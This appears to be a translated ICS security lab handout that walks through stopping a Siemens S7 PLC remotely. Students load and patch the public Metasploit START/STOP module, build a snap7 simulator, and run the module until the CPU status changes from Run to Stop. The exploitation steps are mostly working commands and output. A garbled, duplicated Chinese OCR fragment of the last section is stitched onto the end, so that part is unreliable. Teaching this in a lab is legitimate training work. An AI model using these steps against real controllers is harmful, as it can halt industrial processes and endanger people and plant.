System 2: Protocol Testing Lab Document

Lab principle
First install a Python-based Siemens S7 PLC simulator on the Ubuntu VM. Then test the S7comm protocol from Kali Linux and use a known feature/weakness of Siemens PLCs that lets an attacker stop an S7 PLC remotely.

Lab purpose
Use Kali Linux to test the S7comm protocol and, by exploiting a known feature/weakness of Siemens PLCs, attack the S7 PLC simulator we build so that the S7 PLC stops working.

Lab environment
Kali Linux virtual machine (provided with the environment)
Ubuntu VM

Recommended class time: 2 sessions

Lab steps

S7 communication
S7comm is not a direct part of the PROFINET standard, but it is usually used in the same area of a plant or on the same ICS network. S7comm (S7 Communication) is a proprietary Siemens protocol that allows communication between a PLC (programmable logic controller) and a programming terminal. It is used to program PLCs, for communication between several PLCs, and for communication between a SCADA (supervisory control and data acquisition) system and PLCs. S7comm runs on top of COTP (Connection-Oriented Transport Protocol), the connection-oriented transport protocol of the ISO protocol family, carried over TCP port 102 (ISO-TSAP).

Because S7comm is so widely used, one known feature/weakness of Siemens PLCs deserves attention: an attacker can stop an S7 PLC remotely. Let us look at how an attack on this weakness proceeds. The exploit is part of the Exploit Database, an up-to-date copy of which is installed on the Kali Linux VM, so let us search for it.

Step 1: search Kali Linux for the Siemens Simatic S7 exploit
(1) In a terminal on the Kali Linux VM, run

    searchsploit Siemens Simatic S7

The result is shown in Figure 1.

Figure 1: exploit search. searchsploit lists these entries (title, then path under /usr/share/exploitdb/exploits/):
    Siemens Simatic S7-1200 CPU Command Module (Metasploit)         hardware/remote/38964.rb
    Siemens Simatic S7-1200 CPU START/STOP Module (Metasploit)      hardware/remote/19833.rb
    Siemens Simatic S7-1200 CPU - Cross-Site Request Forgery        linux/webapps/44667.txt
    Siemens Simatic S7-1200 CPU - Cross-Site Scripting              linux/webapps/44687.txt
    Siemens Simatic S7-1500 CPU - Remote Denial of Service          linux/dos/44693.py
    Siemens Simatic S7-300 PLC Remote Memory Viewer (Metasploit)    hardware/remote/19832.rb
    Siemens Simatic S7-300 CPU - Remote Denial of Service           linux/dos/44802.py
    Siemens Simatic S7-300/400 CPU START/STOP Module (Metasploit)   hardware/remote/19831.rb
    Shellcodes: No Results

(2) Run

    cat /usr/share/exploitdb/exploits/hardware/remote/19831.rb

The result is shown in Figure 2.

Figure 2: viewing the file. The header of 19831.rb reads: Exploit Title: Siemens Simatic S7 300/400 CPU command module; Date: 7-13-2012; Exploit Author: Dillon Beresford; Vendor Homepage: www.siemens.com; Tested on: Siemens Simatic S7-300 PLC; CVE: None. After require 'msf/core' the module is declared as class Metasploit3 < Msf::Auxiliary, named "Siemens Simatic S7-300/400 CPU START/STOP Module", with the description "The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP this modules allows an attacker to perform administrative commands without authentication. This module allows a remote user to change the state of the PLC between STOP and START, allowing an attacker to end process control by the PLC." Author: Dillon Beresford; License: MSF_LICENSE; References: www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf and www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf; DisclosureDate: May 09 2011. register_options declares RPORT (default 102), MODE (OptInt, optional: "Mode 1 to Stop CPU. Set Mode to 2 to put the CPU back into RUN mode.", default 1) and CYCLES (OptInt, required: "Set the amount of CPU STOP/RUN cycles.", default 10).

Metasploit already contains a large number of exploits, but this Siemens module has to be added. Since the exploit was written with Metasploit in mind, this is a simple task. To add the module, change to the ~/.msf4/modules directory:

    cd ~/.msf4/modules

Create the directory for the module there:

    mkdir -p auxiliary/hardware/scada

(3) Copy 19831.rb into the directory just created:

    cp /usr/share/exploitdb/exploits/hardware/remote/19831.rb ~/.msf4/modules/auxiliary/hardware/scada

(4) Start the database service:

    service postgresql start

(5) To suit the newer Metasploit framework, one line of 19831.rb must be changed. Look at line 29 of the file (Figure 3).

Figure 3: code modification. Mousepad, opened on /root/.msf4/modules/auxiliary/hardware/scada/19831.rb (with the warning that the root account is in use), shows the header, name, description, references and register_options block from Figure 2; the line to change is marked with a red box.

Change line 29 of 19831.rb to the form shown in the red box in Figure 3. The change needed for current Metasploit versions is the class declaration: class Metasploit3 < Msf::Auxiliary becomes class MetasploitModule < Msf::Auxiliary, because the framework no longer loads modules declared under the old Metasploit3 name. With the script fixed, we can continue with the exploitation process. Start Metasploit:

    msfconsole

The result is shown in Figure 4.

Figure 4: starting msf. msfconsole warns that some modules under /usr/share/metasploit-framework/modules could not be loaded (auxiliary/gather/office365userenum.py and others unrelated to this lab) and that /root/.msf4/modules/auxiliary/hardware/scada/19831.rb was loaded with warnings (details in /root/.msf4/logs/framework.log), then prints the banner: 2099 exploits, 1129 auxiliary, 357 post, 592 payloads, 45 encoders, 10 nops, 7 evasion.

After msf has started, enter the following commands in turn:

    reload_all
    search siemens

The result is shown in Figure 5.

Figure 5: module reload. reload_all repeats the load warnings (office365userenum.py, dos/http/slowloris.py, the scanner/msmail Go modules, scanner/ssl/bleichenbacher_oracle.py, and 19831.rb loaded with warnings); search siemens then lists nine matching modules, of which the last is ours:
    8  auxiliary/hardware/scada/19831  2011-05-09  normal  No  Siemens Simatic S7-300/400 CPU START/STOP Module

The exploit module is now added and can be used with:

    use auxiliary/hardware/scada/19831
    show info

The result is shown in Figure 6.

Figure 6: show info.
    Name: Siemens Simatic S7-300/400 CPU START/STOP Module
    Module: auxiliary/hardware/scada/19831
    License: Metasploit Framework License (BSD)
    Rank: Normal
    Disclosed: 2011-05-09
    Provided by: Dillon Beresford
    Check supported: No
    Basic options:
      Name     Current Setting  Required  Description
      CYCLES   10               yes       Set the amount of CPU STOP/RUN cycles.
      MODE     1                no        Mode 1 to Stop CPU. Set Mode to 2 to put the CPU back into RUN mode.
      RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
      RPORT    102              yes       The target port (TCP)
      THREADS  1                yes       The number of concurrent threads (max one per host)
    Description and References: as in Figure 2.

Step 2: create the Ubuntu VM and install the Python-based S7 PLC
(1) The module is loaded in Metasploit, but before launching the attack we need a target. Rather than buying a Siemens PLC, we install a Python-based Siemens S7 PLC simulator on the Ubuntu VM created earlier. Download the latest version of snap7, the 32/64-bit multi-platform Ethernet S7 PLC communication suite, from sourceforge.net/projects/snap7/files/ and extract it into /tmp/snap7-full/. Then run the following commands in a terminal:

    cd snap7-full-1.4.1
    sudo apt install python3-pip
    sudo pip install python-snap7
    cd build/unix
    make -f x86_64_linux.mk
    cd ../bin/x86_64-linux/
    sudo cp libsnap7.so /usr/lib/
    sudo ldconfig
    sudo python3

This builds the snap7 library, installs it where the Python binding can find it, and opens an interactive Python 3 session (Figure 7).
(2) In the Python session, create and start the S7 server:

    >>> import snap7
    >>> s7server = snap7.server.Server()
    >>> s7server.create()
    >>> s7server.start()

Figure 8: starting s7server. In the session shown, s7.server.create() was typed by mistake and raised NameError: name 's7' is not defined; the object is s7server, and s7server.create() followed by s7server.start() succeeds.

(3) Verify the status of the newly created PLC server:

    >>> s7server.get_status()
    ('SrvRunning', 'S7CpuStatusRun', 0)

Figure 9: querying the s7 status. The tuple is (server status, CPU status, client count): the simulated CPU is in RUN.

Step 3: exploit the weakness from Kali Linux
(1) Back on the Kali Linux machine, in the module we loaded, run:

    show options

The result is shown in Figure 10.

Figure 10: show options. The module options for auxiliary/hardware/scada/19831 are the same five as in Figure 6: CYCLES 10 (yes), MODE 1 (no), RHOSTS empty (yes), RPORT 102 (yes), THREADS 1 (yes).

(2) The only variable we need to set is RHOSTS. Set it to the IP address of the Ubuntu VM, 192.168.17.135, and run the module with exploit:

    set RHOSTS 192.168.17.135
    exploit

The result is shown in Figure 11.

Figure 11: setting parameters.
    msf6 auxiliary(hardware/scada/19831) > set RHOSTS 192.168.17.135
    RHOSTS => 192.168.17.135
    msf6 auxiliary(hardware/scada/19831) > exploit
    [+] 192.168.17.135:102 - 192.168.17.135 PLC is running, iso-tsap port is open.
    [*] 192.168.17.135:102 - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

(3) On the Ubuntu VM, check the status of the S7 PLC simulator again:

    >>> s7server.get_status()
    ('SrvRunning', 'S7CpuStatusStop', 0)

Figure 12: querying the s7server status. The CPU status has changed from S7CpuStatusRun to S7CpuStatusStop: the PLC has been stopped remotely.

PROFINET and most other ICS protocols have no provision for authentication. Anyone with the right tool who knows the PLC's address can send this stop command. The method for finding the hex byte sequence of the stop command is much the same as the one we used in the earlier exercise to find the commands that discover nodes attached to the local network: it comes down to observing the traffic between the programming workstation and the PLC or end device.
33、 execution completed图n设置参数(3)在Ubuntu虚拟机上查看S7 PLC模拟器的状态,在Ubuntu虚拟机的命令 行中输入命令:s7server. get_status()得到的结果如图12所示: s7servereget_status()(SrvRunning1, 1S7CpuStatusStop1, 0)图12查询s7server状态PROF I NET和大多数其他ICS协议都不包含使用身份验证的功能。任何人只要使 用正确的工具且知道PLC的地址,都可以发送这个停止命令。用于查找16进制 值的停止命令序列的方法与我们在前面的练习中查找用于发现本地网络附加节 点的命令的方法非常相似。它归结为观察编程工作站与PLC或终端设备之间的 通信。